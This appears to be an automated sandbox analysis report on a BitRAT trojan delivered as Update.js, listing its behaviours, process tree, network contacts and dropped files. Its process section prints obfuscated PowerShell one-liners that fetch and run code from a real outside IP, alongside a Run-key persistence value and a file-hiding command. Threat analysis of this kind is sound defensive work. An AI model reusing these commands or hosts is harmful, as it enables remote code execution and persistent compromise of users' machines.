Malware Analysis Report

2024-09-22 21:58

Sample ID 240425-s2944acb68
Target Update.js
SHA256 8fe424869272394512941904c4b1ba7039ac2a514acb9861e613f5e85222d9a7
Tags
bitrat persistence trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8fe424869272394512941904c4b1ba7039ac2a514acb9861e613f5e85222d9a7

Threat Level: Known bad

The file Update.js was found to be: Known bad.

Malicious Activity Summary

bitrat persistence trojan upx

BitRAT

Blocklisted process makes network request

UPX packed file

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Views/modifies file attributes

Suspicious use of SetWindowsHookEx

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-04-25 15:38

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-25 15:38

Reported

2024-04-25 15:41

Platform

win11-20240412-en

Max time kernel

148s

Max time network

150s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\Update.js

Signatures

BitRAT

trojan bitrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-801765966-3955847401-2235691403-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft = "wscript //E:VBScript C:\\Users\\Public\\0x.log //Nologo" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1736 wrote to memory of 4660 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1736 wrote to memory of 4660 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1736 wrote to memory of 888 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1736 wrote to memory of 888 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 888 wrote to memory of 4076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 888 wrote to memory of 4076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 888 wrote to memory of 4076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 888 wrote to memory of 4076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 888 wrote to memory of 4076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 888 wrote to memory of 4076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 888 wrote to memory of 4076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 888 wrote to memory of 4076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 888 wrote to memory of 4076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4660 wrote to memory of 1672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4660 wrote to memory of 1672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1672 wrote to memory of 392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1672 wrote to memory of 392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4660 wrote to memory of 4040 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4660 wrote to memory of 4040 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4660 wrote to memory of 4040 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4660 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4660 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4660 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4660 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4660 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4660 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4660 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\Update.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://77.221.151.31/a/z.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://77.221.151.31/a/s.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\Public\0x.log

C:\Windows\system32\attrib.exe

attrib +h C:\Users\Public\0x.log

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

Network

Country Destination Domain Proto
RU 77.221.151.31:80 77.221.151.31 tcp
RU 77.221.151.31:80 77.221.151.31 tcp
US 8.8.8.8:53 31.151.221.77.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 172.67.163.209:443 strollheavengwu.shop tcp
US 172.67.150.207:443 productivelookewr.shop tcp
US 104.21.89.202:443 tolerateilusidjukl.shop tcp
US 8.8.8.8:53 209.163.67.172.in-addr.arpa udp
US 8.8.8.8:53 207.150.67.172.in-addr.arpa udp
US 8.8.8.8:53 202.89.21.104.in-addr.arpa udp
US 172.67.169.43:443 shatterbreathepsw.shop tcp
US 104.21.16.225:443 shortsvelventysjo.shop tcp
US 104.21.86.106:443 incredibleextedwj.shop tcp
US 172.67.157.23:443 alcojoldwograpciw.shop tcp
US 172.67.192.138:443 liabilitynighstjsko.shop tcp
US 172.67.147.169:443 demonstationfukewko.shop tcp
RU 77.221.151.31:4444 tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g4kghkgs.mvm.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4660-8-0x000001C72A820000-0x000001C72A842000-memory.dmp

memory/4660-17-0x00007FFAA9530000-0x00007FFAA9FF2000-memory.dmp

memory/4660-18-0x000001C742CB0000-0x000001C742CC0000-memory.dmp

memory/888-19-0x00007FFAA9530000-0x00007FFAA9FF2000-memory.dmp

memory/888-20-0x000001A174AD0000-0x000001A174AE0000-memory.dmp

memory/888-21-0x000001A174AD0000-0x000001A174AE0000-memory.dmp

memory/4660-22-0x000001C742CB0000-0x000001C742CC0000-memory.dmp

memory/888-24-0x000001A175230000-0x000001A17523E000-memory.dmp

memory/4076-25-0x0000000000400000-0x000000000044E000-memory.dmp

memory/888-29-0x00007FFAA9530000-0x00007FFAA9FF2000-memory.dmp

memory/4076-30-0x0000000000400000-0x000000000044E000-memory.dmp

memory/4076-31-0x0000000000400000-0x000000000044E000-memory.dmp

C:\Users\Public\0x.log

MD5 d2e9de8671fd61605ff5f8b8f3249d6b
SHA1 38dc0accb9c561c4f2ed9cc565f73a09eb84e81c
SHA256 fcdaa801a02c05faa8e09a1abb75ab4b8b4a57e1d097cc5feb63b95280230e5c
SHA512 413abbf5eb1a19fec41bbf31cfa524a8c88f049ae624c2b8f8cd40b3dc6ca37b99a45e74cfcb3422bee104e218ebc6b3d38f22b5b9afbd967545aa862b15a106

memory/2060-33-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-34-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-35-0x0000000000400000-0x00000000007D3000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 5f4c933102a824f41e258078e34165a7
SHA1 d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256 d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512 a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9b9c200437ca6453c1a7a66285ebbc98
SHA1 238f1e7629bc0c371ba4fa3f0bb335302b21d909
SHA256 e98bf0b04cdec1745689b16cccbae66f1ad977f178968736dbfc9a8f0f08c5ff
SHA512 12c183cb8b99867d85a982066629267ce110dccc455a8a62bb1d9175db84aa603ba9a18b7e3fed99d84e94ccffe78af284f7743df46753057bcaefda94c55926

memory/2060-39-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-41-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/4660-40-0x00007FFAA9530000-0x00007FFAA9FF2000-memory.dmp

memory/4076-42-0x0000000000400000-0x000000000044E000-memory.dmp

memory/2060-43-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-44-0x0000000074570000-0x00000000745AC000-memory.dmp

memory/2060-45-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-46-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-47-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-48-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-49-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-50-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-51-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-52-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-53-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-54-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-55-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-57-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-58-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-59-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-61-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-60-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-62-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-63-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-64-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-65-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-66-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-67-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-68-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-69-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-70-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-72-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-74-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-75-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-77-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-79-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-81-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-83-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-85-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-86-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-87-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-89-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-90-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-91-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-93-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-94-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-95-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-97-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-99-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-101-0x0000000000400000-0x00000000007D3000-memory.dmp